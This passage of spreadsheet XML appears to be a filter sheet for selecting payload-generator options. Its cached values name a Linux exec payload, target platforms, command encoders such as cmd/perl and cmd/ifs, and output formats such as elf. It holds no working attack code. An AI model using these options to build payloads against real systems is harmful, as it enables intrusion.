      <c r="B25" s="137" t="s">
        <v>21908</v>
      </c>
      <c r="C25" s="117"/>
      <c r="D25" s="117"/>
      <c r="E25" s="117"/>
      <c r="F25" s="117"/>
      <c r="G25" s="117"/>
      <c r="H25" s="117"/>
      <c r="I25" s="117"/>
      <c r="J25" s="117"/>
      <c r="K25" s="117"/>
      <c r="L25" s="117"/>
      <c r="M25" s="117"/>
      <c r="N25" s="117"/>
      <c r="O25" s="117"/>
      <c r="P25" s="117"/>
      <c r="Q25" s="117"/>
      <c r="R25" s="117"/>
      <c r="S25" s="117"/>
      <c r="T25" s="117"/>
      <c r="U25" s="117"/>
      <c r="V25" s="117"/>
      <c r="W25" s="117"/>
      <c r="X25" s="117"/>
      <c r="Y25" s="117"/>
      <c r="Z25" s="117"/>
    </row>
    <row r="26" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A26" s="117"/>
      <c r="B26" s="262"/>
      <c r="C26" s="262"/>
      <c r="D26" s="262"/>
      <c r="E26" s="262"/>
      <c r="F26" s="262"/>
      <c r="G26" s="262"/>
      <c r="H26" s="262"/>
      <c r="I26" s="262"/>
      <c r="J26" s="117"/>
      <c r="K26" s="117"/>
      <c r="L26" s="117"/>
      <c r="M26" s="117"/>
      <c r="N26" s="117"/>
      <c r="O26" s="117"/>
      <c r="P26" s="117"/>
      <c r="Q26" s="117"/>
      <c r="R26" s="117"/>
      <c r="S26" s="117"/>
      <c r="T26" s="117"/>
      <c r="U26" s="117"/>
      <c r="V26" s="117"/>
      <c r="W26" s="117"/>
      <c r="X26" s="117"/>
      <c r="Y26" s="117"/>
      <c r="Z26" s="117"/>
    </row>
    <row r="27" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A27" s="117"/>
      <c r="B27" s="262"/>
      <c r="C27" s="262"/>
      <c r="D27" s="262"/>
      <c r="E27" s="262"/>
      <c r="F27" s="262"/>
      <c r="G27" s="262"/>
      <c r="H27" s="262"/>
      <c r="I27" s="262"/>
      <c r="J27" s="117"/>
      <c r="K27" s="117"/>
      <c r="L27" s="117"/>
      <c r="M27" s="117"/>
      <c r="N27" s="117"/>
      <c r="O27" s="117"/>
      <c r="P27" s="117"/>
      <c r="Q27" s="117"/>
      <c r="R27" s="117"/>
      <c r="S27" s="117"/>
      <c r="T27" s="117"/>
      <c r="U27" s="117"/>
      <c r="V27" s="117"/>
      <c r="W27" s="117"/>
      <c r="X27" s="117"/>
      <c r="Y27" s="117"/>
      <c r="Z27" s="117"/>
    </row>
    <row r="28" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A28" s="117"/>
      <c r="B28" s="117"/>
      <c r="C28" s="117"/>
      <c r="D28" s="117"/>
      <c r="E28" s="117"/>
      <c r="F28" s="117"/>
      <c r="G28" s="117"/>
      <c r="H28" s="117"/>
      <c r="I28" s="117"/>
      <c r="J28" s="117"/>
      <c r="K28" s="117"/>
      <c r="L28" s="117"/>
      <c r="M28" s="117"/>
      <c r="N28" s="117"/>
      <c r="O28" s="117"/>
      <c r="P28" s="117"/>
      <c r="Q28" s="117"/>
      <c r="R28" s="117"/>
      <c r="S28" s="117"/>
      <c r="T28" s="117"/>
      <c r="U28" s="117"/>
      <c r="V28" s="117"/>
      <c r="W28" s="117"/>
      <c r="X28" s="117"/>
      <c r="Y28" s="117"/>
      <c r="Z28" s="117"/>
    </row>
    <row r="29" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A29" s="117"/>
      <c r="B29" s="117"/>
      <c r="C29" s="117"/>
      <c r="D29" s="117"/>
      <c r="E29" s="117"/>
      <c r="F29" s="117"/>
      <c r="G29" s="117"/>
      <c r="H29" s="117"/>
      <c r="I29" s="117"/>
      <c r="J29" s="117"/>
      <c r="K29" s="117"/>
      <c r="L29" s="117"/>
      <c r="M29" s="117"/>
      <c r="N29" s="117"/>
      <c r="O29" s="117"/>
      <c r="P29" s="117"/>
      <c r="Q29" s="117"/>
      <c r="R29" s="117"/>
      <c r="S29" s="117"/>
      <c r="T29" s="117"/>
      <c r="U29" s="117"/>
      <c r="V29" s="117"/>
      <c r="W29" s="117"/>
      <c r="X29" s="117"/>
      <c r="Y29" s="117"/>
      <c r="Z29" s="117"/>
    </row>
    <row r="30" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A30" s="117"/>
      <c r="B30" s="117"/>
      <c r="C30" s="117"/>
      <c r="D30" s="117"/>
      <c r="E30" s="117"/>
      <c r="F30" s="117"/>
      <c r="G30" s="117"/>
      <c r="H30" s="117"/>
      <c r="I30" s="117"/>
      <c r="J30" s="117"/>
      <c r="K30" s="117"/>
      <c r="L30" s="117"/>
      <c r="M30" s="117"/>
      <c r="N30" s="117"/>
      <c r="O30" s="117"/>
      <c r="P30" s="117"/>
      <c r="Q30" s="117"/>
      <c r="R30" s="117"/>
      <c r="S30" s="117"/>
      <c r="T30" s="117"/>
      <c r="U30" s="117"/>
      <c r="V30" s="117"/>
      <c r="W30" s="117"/>
      <c r="X30" s="117"/>
      <c r="Y30" s="117"/>
      <c r="Z30" s="117"/>
    </row>
    <row r="31" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A31" s="117"/>
      <c r="B31" s="117"/>
      <c r="C31" s="117"/>
      <c r="D31" s="117"/>
      <c r="E31" s="117"/>
      <c r="F31" s="117"/>
      <c r="G31" s="117"/>
      <c r="H31" s="117"/>
      <c r="I31" s="117"/>
      <c r="J31" s="117"/>
      <c r="K31" s="117"/>
      <c r="L31" s="117"/>
      <c r="M31" s="117"/>
      <c r="N31" s="117"/>
      <c r="O31" s="117"/>
      <c r="P31" s="117"/>
      <c r="Q31" s="117"/>
      <c r="R31" s="117"/>
      <c r="S31" s="117"/>
      <c r="T31" s="117"/>
      <c r="U31" s="117"/>
      <c r="V31" s="117"/>
      <c r="W31" s="117"/>
      <c r="X31" s="117"/>
      <c r="Y31" s="117"/>
      <c r="Z31" s="117"/>
    </row>
    <row r="32" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A32" s="117"/>
      <c r="B32" s="117"/>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row>
    <row r="33" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A33" s="117"/>
      <c r="B33" s="117"/>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row>
    <row r="34" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A34" s="117"/>
      <c r="B34" s="117"/>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row>
    <row r="35" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A35" s="117"/>
      <c r="B35" s="117"/>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row>
    <row r="36" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A36" s="117"/>
      <c r="B36" s="117"/>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row>
    <row r="37" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A37" s="117"/>
      <c r="B37" s="117"/>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row>
    <row r="38" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A38" s="117"/>
      <c r="B38" s="117"/>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row>
    <row r="39" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A39" s="117"/>
      <c r="B39" s="117"/>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7"/>
    </row>
    <row r="40" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A40" s="117"/>
      <c r="B40" s="117"/>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row>
    <row r="41" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A41" s="117"/>
      <c r="B41" s="117"/>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row>
    <row r="42" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A42" s="117"/>
      <c r="B42" s="117"/>
      <c r="C42" s="117"/>
      <c r="D42" s="117"/>
      <c r="E42" s="117"/>
      <c r="F42" s="117"/>
      <c r="G42" s="117"/>
      <c r="H42" s="117"/>
      <c r="I42" s="117"/>
      <c r="J42" s="117"/>
      <c r="K42" s="117"/>
      <c r="L42" s="117"/>
      <c r="M42" s="117"/>
      <c r="N42" s="117"/>
      <c r="O42" s="117"/>
      <c r="P42" s="117"/>
      <c r="Q42" s="117"/>
      <c r="R42" s="117"/>
      <c r="S42" s="117"/>
      <c r="T42" s="117"/>
      <c r="U42" s="117"/>
      <c r="V42" s="117"/>
      <c r="W42" s="117"/>
      <c r="X42" s="117"/>
      <c r="Y42" s="117"/>
      <c r="Z42" s="117"/>
    </row>
    <row r="43" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A43" s="117"/>
      <c r="B43" s="117"/>
      <c r="C43" s="117"/>
      <c r="D43" s="117"/>
      <c r="E43" s="117"/>
      <c r="F43" s="117"/>
      <c r="G43" s="117"/>
      <c r="H43" s="117"/>
      <c r="I43" s="117"/>
      <c r="J43" s="117"/>
      <c r="K43" s="117"/>
      <c r="L43" s="117"/>
      <c r="M43" s="117"/>
      <c r="N43" s="117"/>
      <c r="O43" s="117"/>
      <c r="P43" s="117"/>
      <c r="Q43" s="117"/>
      <c r="R43" s="117"/>
      <c r="S43" s="117"/>
      <c r="T43" s="117"/>
      <c r="U43" s="117"/>
      <c r="V43" s="117"/>
      <c r="W43" s="117"/>
      <c r="X43" s="117"/>
      <c r="Y43" s="117"/>
      <c r="Z43" s="117"/>
    </row>
    <row r="44" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A44" s="117"/>
      <c r="B44" s="117"/>
      <c r="C44" s="117"/>
      <c r="D44" s="117"/>
      <c r="E44" s="117"/>
      <c r="F44" s="117"/>
      <c r="G44" s="117"/>
      <c r="H44" s="117"/>
      <c r="I44" s="117"/>
      <c r="J44" s="117"/>
      <c r="K44" s="117"/>
      <c r="L44" s="117"/>
      <c r="M44" s="117"/>
      <c r="N44" s="117"/>
      <c r="O44" s="117"/>
      <c r="P44" s="117"/>
      <c r="Q44" s="117"/>
      <c r="R44" s="117"/>
      <c r="S44" s="117"/>
      <c r="T44" s="117"/>
      <c r="U44" s="117"/>
      <c r="V44" s="117"/>
      <c r="W44" s="117"/>
      <c r="X44" s="117"/>
      <c r="Y44" s="117"/>
      <c r="Z44" s="117"/>
    </row>
    <row r="45" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A45" s="117"/>
      <c r="B45" s="117"/>
      <c r="C45" s="117"/>
      <c r="D45" s="117"/>
      <c r="E45" s="117"/>
      <c r="F45" s="117"/>
      <c r="G45" s="117"/>
      <c r="H45" s="117"/>
      <c r="I45" s="117"/>
      <c r="J45" s="117"/>
      <c r="K45" s="117"/>
      <c r="L45" s="117"/>
      <c r="M45" s="117"/>
      <c r="N45" s="117"/>
      <c r="O45" s="117"/>
      <c r="P45" s="117"/>
      <c r="Q45" s="117"/>
      <c r="R45" s="117"/>
      <c r="S45" s="117"/>
      <c r="T45" s="117"/>
      <c r="U45" s="117"/>
      <c r="V45" s="117"/>
      <c r="W45" s="117"/>
      <c r="X45" s="117"/>
      <c r="Y45" s="117"/>
      <c r="Z45" s="117"/>
    </row>
    <row r="46" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A46" s="117"/>
      <c r="B46" s="117"/>
      <c r="C46" s="117"/>
      <c r="D46" s="117"/>
      <c r="E46" s="117"/>
      <c r="F46" s="117"/>
      <c r="G46" s="117"/>
      <c r="H46" s="117"/>
      <c r="I46" s="117"/>
      <c r="J46" s="117"/>
      <c r="K46" s="117"/>
      <c r="L46" s="117"/>
      <c r="M46" s="117"/>
      <c r="N46" s="117"/>
      <c r="O46" s="117"/>
      <c r="P46" s="117"/>
      <c r="Q46" s="117"/>
      <c r="R46" s="117"/>
      <c r="S46" s="117"/>
      <c r="T46" s="117"/>
      <c r="U46" s="117"/>
      <c r="V46" s="117"/>
      <c r="W46" s="117"/>
      <c r="X46" s="117"/>
      <c r="Y46" s="117"/>
      <c r="Z46" s="117"/>
    </row>
    <row r="47" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A47" s="117"/>
      <c r="B47" s="117"/>
      <c r="C47" s="117"/>
      <c r="D47" s="117"/>
      <c r="E47" s="117"/>
      <c r="F47" s="117"/>
      <c r="G47" s="117"/>
      <c r="H47" s="117"/>
      <c r="I47" s="117"/>
      <c r="J47" s="117"/>
      <c r="K47" s="117"/>
      <c r="L47" s="117"/>
      <c r="M47" s="117"/>
      <c r="N47" s="117"/>
      <c r="O47" s="117"/>
      <c r="P47" s="117"/>
      <c r="Q47" s="117"/>
      <c r="R47" s="117"/>
      <c r="S47" s="117"/>
      <c r="T47" s="117"/>
      <c r="U47" s="117"/>
      <c r="V47" s="117"/>
      <c r="W47" s="117"/>
      <c r="X47" s="117"/>
      <c r="Y47" s="117"/>
      <c r="Z47" s="117"/>
    </row>
    <row r="48" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A48" s="117"/>
      <c r="B48" s="117"/>
      <c r="C48" s="117"/>
      <c r="D48" s="117"/>
      <c r="E48" s="117"/>
      <c r="F48" s="117"/>
      <c r="G48" s="117"/>
      <c r="H48" s="117"/>
      <c r="I48" s="117"/>
      <c r="J48" s="117"/>
      <c r="K48" s="117"/>
      <c r="L48" s="117"/>
      <c r="M48" s="117"/>
      <c r="N48" s="117"/>
      <c r="O48" s="117"/>
      <c r="P48" s="117"/>
      <c r="Q48" s="117"/>
      <c r="R48" s="117"/>
      <c r="S48" s="117"/>
      <c r="T48" s="117"/>
      <c r="U48" s="117"/>
      <c r="V48" s="117"/>
      <c r="W48" s="117"/>
      <c r="X48" s="117"/>
      <c r="Y48" s="117"/>
      <c r="Z48" s="117"/>
    </row>
    <row r="49" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A49" s="117"/>
      <c r="B49" s="117"/>
      <c r="C49" s="117"/>
      <c r="D49" s="117"/>
      <c r="E49" s="117"/>
      <c r="F49" s="117"/>
      <c r="G49" s="117"/>
      <c r="H49" s="117"/>
      <c r="I49" s="117"/>
      <c r="J49" s="117"/>
      <c r="K49" s="117"/>
      <c r="L49" s="117"/>
      <c r="M49" s="117"/>
      <c r="N49" s="117"/>
      <c r="O49" s="117"/>
      <c r="P49" s="117"/>
      <c r="Q49" s="117"/>
      <c r="R49" s="117"/>
      <c r="S49" s="117"/>
      <c r="T49" s="117"/>
      <c r="U49" s="117"/>
      <c r="V49" s="117"/>
      <c r="W49" s="117"/>
      <c r="X49" s="117"/>
      <c r="Y49" s="117"/>
      <c r="Z49" s="117"/>
    </row>
    <row r="50" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A50" s="117"/>
      <c r="B50" s="117"/>
      <c r="C50" s="117"/>
      <c r="D50" s="117"/>
      <c r="E50" s="117"/>
      <c r="F50" s="117"/>
      <c r="G50" s="117"/>
      <c r="H50" s="117"/>
      <c r="I50" s="117"/>
      <c r="J50" s="117"/>
      <c r="K50" s="117"/>
      <c r="L50" s="117"/>
      <c r="M50" s="117"/>
      <c r="N50" s="117"/>
      <c r="O50" s="117"/>
      <c r="P50" s="117"/>
      <c r="Q50" s="117"/>
      <c r="R50" s="117"/>
      <c r="S50" s="117"/>
      <c r="T50" s="117"/>
      <c r="U50" s="117"/>
      <c r="V50" s="117"/>
      <c r="W50" s="117"/>
      <c r="X50" s="117"/>
      <c r="Y50" s="117"/>
      <c r="Z50" s="117"/>
    </row>
    <row r="51" spans="1:26" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A51" s="125" t="s">
        <v>21909</v>
      </c>
      <c r="B51" s="118" t="s">
        <v>21910</v>
      </c>
      <c r="C51" s="118" t="s">
        <v>21911</v>
      </c>
      <c r="D51" s="118" t="s">
        <v>21912</v>
      </c>
      <c r="E51" s="125" t="s">
        <v>21913</v>
      </c>
      <c r="F51" s="118" t="s">
        <v>21910</v>
      </c>
      <c r="G51" s="118" t="s">
        <v>21911</v>
      </c>
      <c r="H51" s="118" t="s">
        <v>21912</v>
      </c>
      <c r="I51" s="125" t="s">
        <v>21899</v>
      </c>
      <c r="J51" s="118" t="s">
        <v>21910</v>
      </c>
      <c r="K51" s="118" t="s">
        <v>21911</v>
      </c>
      <c r="L51" s="118" t="s">
        <v>21912</v>
      </c>
      <c r="M51" s="125" t="s">
        <v>21898</v>
      </c>
      <c r="N51" s="118" t="s">
        <v>21910</v>
      </c>
      <c r="O51" s="118" t="s">
        <v>21911</v>
      </c>
      <c r="P51" s="118" t="s">
        <v>21912</v>
      </c>
      <c r="Q51" s="125" t="s">
        <v>21904</v>
      </c>
      <c r="R51" s="118" t="s">
        <v>21910</v>
      </c>
      <c r="S51" s="118" t="s">
        <v>21911</v>
      </c>
      <c r="T51" s="118" t="s">
        <v>21912</v>
      </c>
    </row>
    <row r="52" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A52" s="126" t="s">
        <v>21914</v>
      </c>
      <c r="B52" s="127"/>
      <c r="C52" s="127"/>
      <c r="D52" s="128"/>
      <c r="E52" s="126" t="s">
        <v>21915</v>
      </c>
      <c r="F52" s="127"/>
      <c r="G52" s="127"/>
      <c r="H52" s="127"/>
      <c r="I52" s="126" t="s">
        <v>21915</v>
      </c>
      <c r="J52" s="127"/>
      <c r="K52" s="127"/>
      <c r="L52" s="127"/>
      <c r="M52" s="126" t="s">
        <v>21916</v>
      </c>
      <c r="N52" s="127"/>
      <c r="O52" s="127"/>
      <c r="P52" s="127"/>
      <c r="Q52" s="126" t="s">
        <v>21917</v>
      </c>
      <c r="R52" s="127"/>
      <c r="S52" s="127"/>
      <c r="T52" s="128"/>
      <c r="U52" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="53" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A53" s="130" t="s">
        <v>21918</v>
      </c>
      <c r="B53" s="131">
        <f>--ISNUMBER(IFERROR(SEARCH($A$52,A53,1),""))</f>
        <v>0</v>
      </c>
      <c r="C53" s="131" t="str">
        <f>IF(B53=1,COUNTIF($B$53:B53,1),"")</f>
        <v/>
      </c>
      <c r="D53" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C53),$C$53:$C$618,0)),"")</f>
        <v>linux/x86/exec</v>
      </c>
      <c r="E53" s="130" t="s">
        <v>21919</v>
      </c>
      <c r="F53" s="131">
        <f>--ISNUMBER(IFERROR(SEARCH($E$52,E53,1),""))</f>
        <v>1</v>
      </c>
      <c r="G53" s="131">
        <f>IF(F53=1,COUNTIF($F$53:F53,1),"")</f>
        <v>1</v>
      </c>
      <c r="H53" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G53),$G$53:$G$84,0)),"")</f>
        <v>aix</v>
      </c>
      <c r="I53" s="130" t="s">
        <v>21920</v>
      </c>
      <c r="J53" s="131">
        <f>--ISNUMBER(IFERROR(SEARCH($I$52,I53,1),""))</f>
        <v>1</v>
      </c>
      <c r="K53" s="131">
        <f>IF(J53=1,COUNTIF($J$53:J53,1),"")</f>
        <v>1</v>
      </c>
      <c r="L53" s="131" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K53),$K$53:$K$97,0)),"")</f>
        <v>cmd/brace</v>
      </c>
      <c r="M53" s="130" t="s">
        <v>21916</v>
      </c>
      <c r="N53" s="131">
        <f>--ISNUMBER(IFERROR(SEARCH($M$52,M53,1),""))</f>
        <v>1</v>
      </c>
      <c r="O53" s="131">
        <f>IF(N53=1,COUNTIF($N$53:N53,1),"")</f>
        <v>1</v>
      </c>
      <c r="P53" s="131" t="str">
        <f>IFERROR(INDEX($M$53:$M$54,MATCH(ROWS($O$53:O53),$O$53:$O$54,0)),"")</f>
        <v>x86</v>
      </c>
      <c r="Q53" s="130" t="s">
        <v>21921</v>
      </c>
      <c r="R53" s="131">
        <f>--ISNUMBER(IFERROR(SEARCH($Q$52,Q53,1),""))</f>
        <v>0</v>
      </c>
      <c r="S53" s="131" t="str">
        <f>IF(R53=1,COUNTIF($R$53:R53,1),"")</f>
        <v/>
      </c>
      <c r="T53" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S53),$S$53:$S$104,0)),"")</f>
        <v>elf</v>
      </c>
      <c r="U53" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="54" spans="1:26" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A54" s="130" t="s">
        <v>21922</v>
      </c>
      <c r="B54" s="131">
        <f t="shared" ref="B54:B117" si="0">--ISNUMBER(IFERROR(SEARCH($A$52,A54,1),""))</f>
        <v>0</v>
      </c>
      <c r="C54" s="131" t="str">
        <f>IF(B54=1,COUNTIF($B$53:B54,1),"")</f>
        <v/>
      </c>
      <c r="D54" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C54),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E54" s="130" t="s">
        <v>21923</v>
      </c>
      <c r="F54" s="131">
        <f t="shared" ref="F54:F84" si="1">--ISNUMBER(IFERROR(SEARCH($E$52,E54,1),""))</f>
        <v>1</v>
      </c>
      <c r="G54" s="131">
        <f>IF(F54=1,COUNTIF($F$53:F54,1),"")</f>
        <v>2</v>
      </c>
      <c r="H54" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G54),$G$53:$G$84,0)),"")</f>
        <v>android</v>
      </c>
      <c r="I54" s="130" t="s">
        <v>21924</v>
      </c>
      <c r="J54" s="131">
        <f t="shared" ref="J54:J97" si="2">--ISNUMBER(IFERROR(SEARCH($I$52,I54,1),""))</f>
        <v>1</v>
      </c>
      <c r="K54" s="131">
        <f>IF(J54=1,COUNTIF($J$53:J54,1),"")</f>
        <v>2</v>
      </c>
      <c r="L54" s="131" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K54),$K$53:$K$97,0)),"")</f>
        <v>cmd/echo</v>
      </c>
      <c r="M54" s="133" t="s">
        <v>21925</v>
      </c>
      <c r="N54" s="134">
        <f>--ISNUMBER(IFERROR(SEARCH($M$52,M54,1),""))</f>
        <v>0</v>
      </c>
      <c r="O54" s="134" t="str">
        <f>IF(N54=1,COUNTIF($N$53:N54,1),"")</f>
        <v/>
      </c>
      <c r="P54" s="134" t="str">
        <f>IFERROR(INDEX($M$53:$M$54,MATCH(ROWS($O$53:O54),$O$53:$O$54,0)),"")</f>
        <v/>
      </c>
      <c r="Q54" s="130" t="s">
        <v>21926</v>
      </c>
      <c r="R54" s="131">
        <f t="shared" ref="R54:R104" si="3">--ISNUMBER(IFERROR(SEARCH($Q$52,Q54,1),""))</f>
        <v>0</v>
      </c>
      <c r="S54" s="131" t="str">
        <f>IF(R54=1,COUNTIF($R$53:R54,1),"")</f>
        <v/>
      </c>
      <c r="T54" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S54),$S$53:$S$104,0)),"")</f>
        <v>elf-so</v>
      </c>
      <c r="U54" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="55" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A55" s="130" t="s">
        <v>21927</v>
      </c>
      <c r="B55" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C55" s="131" t="str">
        <f>IF(B55=1,COUNTIF($B$53:B55,1),"")</f>
        <v/>
      </c>
      <c r="D55" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C55),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E55" s="130" t="s">
        <v>21928</v>
      </c>
      <c r="F55" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G55" s="131">
        <f>IF(F55=1,COUNTIF($F$53:F55,1),"")</f>
        <v>3</v>
      </c>
      <c r="H55" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G55),$G$53:$G$84,0)),"")</f>
        <v>apple_ios</v>
      </c>
      <c r="I55" s="130" t="s">
        <v>21929</v>
      </c>
      <c r="J55" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K55" s="131">
        <f>IF(J55=1,COUNTIF($J$53:J55,1),"")</f>
        <v>3</v>
      </c>
      <c r="L55" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K55),$K$53:$K$97,0)),"")</f>
        <v>cmd/generic_sh</v>
      </c>
      <c r="M55" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q55" s="130" t="s">
        <v>21930</v>
      </c>
      <c r="R55" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S55" s="131" t="str">
        <f>IF(R55=1,COUNTIF($R$53:R55,1),"")</f>
        <v/>
      </c>
      <c r="T55" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S55),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U55" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="56" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A56" s="130" t="s">
        <v>21931</v>
      </c>
      <c r="B56" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C56" s="131" t="str">
        <f>IF(B56=1,COUNTIF($B$53:B56,1),"")</f>
        <v/>
      </c>
      <c r="D56" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C56),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E56" s="130" t="s">
        <v>21932</v>
      </c>
      <c r="F56" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G56" s="131">
        <f>IF(F56=1,COUNTIF($F$53:F56,1),"")</f>
        <v>4</v>
      </c>
      <c r="H56" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G56),$G$53:$G$84,0)),"")</f>
        <v>brocade</v>
      </c>
      <c r="I56" s="130" t="s">
        <v>21933</v>
      </c>
      <c r="J56" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K56" s="131">
        <f>IF(J56=1,COUNTIF($J$53:J56,1),"")</f>
        <v>4</v>
      </c>
      <c r="L56" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K56),$K$53:$K$97,0)),"")</f>
        <v>cmd/ifs</v>
      </c>
      <c r="M56" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q56" s="130" t="s">
        <v>21934</v>
      </c>
      <c r="R56" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S56" s="131" t="str">
        <f>IF(R56=1,COUNTIF($R$53:R56,1),"")</f>
        <v/>
      </c>
      <c r="T56" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S56),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U56" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="57" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A57" s="130" t="s">
        <v>21935</v>
      </c>
      <c r="B57" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C57" s="131" t="str">
        <f>IF(B57=1,COUNTIF($B$53:B57,1),"")</f>
        <v/>
      </c>
      <c r="D57" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C57),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E57" s="130" t="s">
        <v>21936</v>
      </c>
      <c r="F57" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G57" s="131">
        <f>IF(F57=1,COUNTIF($F$53:F57,1),"")</f>
        <v>5</v>
      </c>
      <c r="H57" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G57),$G$53:$G$84,0)),"")</f>
        <v>bsd</v>
      </c>
      <c r="I57" s="130" t="s">
        <v>21937</v>
      </c>
      <c r="J57" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K57" s="131">
        <f>IF(J57=1,COUNTIF($J$53:J57,1),"")</f>
        <v>5</v>
      </c>
      <c r="L57" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K57),$K$53:$K$97,0)),"")</f>
        <v>cmd/perl</v>
      </c>
      <c r="M57" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q57" s="130" t="s">
        <v>21938</v>
      </c>
      <c r="R57" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S57" s="131" t="str">
        <f>IF(R57=1,COUNTIF($R$53:R57,1),"")</f>
        <v/>
      </c>
      <c r="T57" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S57),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U57" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="58" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A58" s="130" t="s">
        <v>21939</v>
      </c>
      <c r="B58" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C58" s="131" t="str">
        <f>IF(B58=1,COUNTIF($B$53:B58,1),"")</f>
        <v/>
      </c>
      <c r="D58" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C58),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E58" s="130" t="s">
        <v>21940</v>
      </c>
      <c r="F58" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G58" s="131">
        <f>IF(F58=1,COUNTIF($F$53:F58,1),"")</f>
        <v>6</v>
      </c>
      <c r="H58" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G58),$G$53:$G$84,0)),"")</f>
        <v>bsdi</v>
      </c>
      <c r="I58" s="130" t="s">
        <v>21941</v>
      </c>
      <c r="J58" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K58" s="131">
        <f>IF(J58=1,COUNTIF($J$53:J58,1),"")</f>
        <v>6</v>
      </c>
